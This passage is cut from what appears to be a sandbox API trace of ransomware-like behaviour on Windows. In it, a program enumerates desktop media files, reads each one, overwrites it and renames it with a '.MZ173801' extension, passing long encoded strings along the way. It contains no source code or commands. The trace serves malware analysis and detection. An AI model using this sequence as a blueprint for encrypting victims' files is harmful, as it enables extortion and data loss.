E0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.218] GetCurrentThreadId () returned 0x1358 [0123.218] GetCurrentThreadId () returned 0x1358 [0123.218] GetCurrentThreadId () returned 0x1358 [0123.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.219] GetCurrentThreadId () returned 0x1358 [0123.219] GetCurrentThreadId () returned 0x1358 [0123.219] GetCurrentThreadId () returned 0x1358 [0123.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\n4HyEznF.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\n4hyeznf.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.219] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.219] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.219] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xf1c8 [0123.219] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.219] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xf1c8, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xf1c8, lpOverlapped=0x0) returned 1 [0123.220] CloseHandle (hObject=0x410) returned 1 [0123.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\n4HyEznF.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\n4hyeznf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.222] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xf1c8, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xf1c8, lpOverlapped=0x0) returned 1 [0123.224] CloseHandle (hObject=0x410) returned 1 [0123.224] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\n4HyEznF.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\n4hyeznf.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\n4HyEznF.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\n4hyeznf.mkv.mz173801")) returned 1 [0123.225] GetCurrentThreadId () returned 0x1358 [0123.225] GetCurrentThreadId () returned 0x1358 [0123.225] GetCurrentThreadId () returned 0x1358 [0123.225] GetCurrentThreadId () returned 0x1358 [0123.225] GetCurrentThreadId () returned 0x1358 [0123.225] GetCurrentThreadId () returned 0x1358 [0123.225] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe88ae0c0, ftCreationTime.dwHighDateTime=0x1d5e259, ftLastAccessTime.dwLowDateTime=0x2820ca40, ftLastAccessTime.dwHighDateTime=0x1d5edec, ftLastWriteTime.dwLowDateTime=0x2820ca40, ftLastWriteTime.dwHighDateTime=0x1d5edec, nFileSizeHigh=0x0, nFileSizeLow=0x1610, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nWHuAKIfFRpShxOMaw.mp4", cAlternateFileName="NWHUAK~1.MP4")) returned 1 [0123.225] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.225] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\nWHuAKIfFRpShxOMaw.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\nwhuakiffrpshxomaw.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe88ae0c0, ftCreationTime.dwHighDateTime=0x1d5e259, ftLastAccessTime.dwLowDateTime=0x2820ca40, ftLastAccessTime.dwHighDateTime=0x1d5edec, ftLastWriteTime.dwLowDateTime=0x2820ca40, ftLastWriteTime.dwHighDateTime=0x1d5edec, nFileSizeHigh=0x0, nFileSizeLow=0x1610)) returned 1 [0123.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.226] GetCurrentThreadId () returned 0x1358 [0123.226] GetCurrentThreadId () returned 0x1358 [0123.226] GetCurrentThreadId () returned 0x1358 [0123.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.226] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.227] GetCurrentThreadId () returned 0x1358 [0123.227] GetCurrentThreadId () returned 0x1358 [0123.227] GetCurrentThreadId () returned 0x1358 [0123.227] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nWHuAKIfFRpShxOMaw.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\nwhuakiffrpshxomaw.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.227] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.227] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.227] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1610 [0123.227] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.227] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1610, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1610, lpOverlapped=0x0) returned 1 [0123.228] CloseHandle (hObject=0x410) returned 1 [0123.228] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\nWHuAKIfFRpShxOMaw.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\nwhuakiffrpshxomaw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.229] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1610, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x1610, lpOverlapped=0x0) returned 1 [0123.230] CloseHandle (hObject=0x410) returned 1 [0123.230] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\nWHuAKIfFRpShxOMaw.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\nwhuakiffrpshxomaw.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\nWHuAKIfFRpShxOMaw.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\nwhuakiffrpshxomaw.mp4.mz173801")) returned 1 [0123.231] GetCurrentThreadId () returned 0x1358 [0123.231] GetCurrentThreadId () returned 0x1358 [0123.231] GetCurrentThreadId () returned 0x1358 [0123.231] GetCurrentThreadId () returned 0x1358 [0123.231] GetCurrentThreadId () returned 0x1358 [0123.231] GetCurrentThreadId () returned 0x1358 [0123.231] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d633990, ftCreationTime.dwHighDateTime=0x1d5eb56, ftLastAccessTime.dwLowDateTime=0xc5bfd600, ftLastAccessTime.dwHighDateTime=0x1d5e0af, ftLastWriteTime.dwLowDateTime=0xc5bfd600, ftLastWriteTime.dwHighDateTime=0x1d5e0af, nFileSizeHigh=0x0, nFileSizeLow=0x18631, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o_sfpnC-AoY-JO.wav", cAlternateFileName="O_SFPN~1.WAV")) returned 1 [0123.231] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.231] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.231] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\o_sfpnC-AoY-JO.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\o_sfpnc-aoy-jo.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d633990, ftCreationTime.dwHighDateTime=0x1d5eb56, ftLastAccessTime.dwLowDateTime=0xc5bfd600, ftLastAccessTime.dwHighDateTime=0x1d5e0af, ftLastWriteTime.dwLowDateTime=0xc5bfd600, ftLastWriteTime.dwHighDateTime=0x1d5e0af, nFileSizeHigh=0x0, nFileSizeLow=0x18631)) returned 1 [0123.231] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.231] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 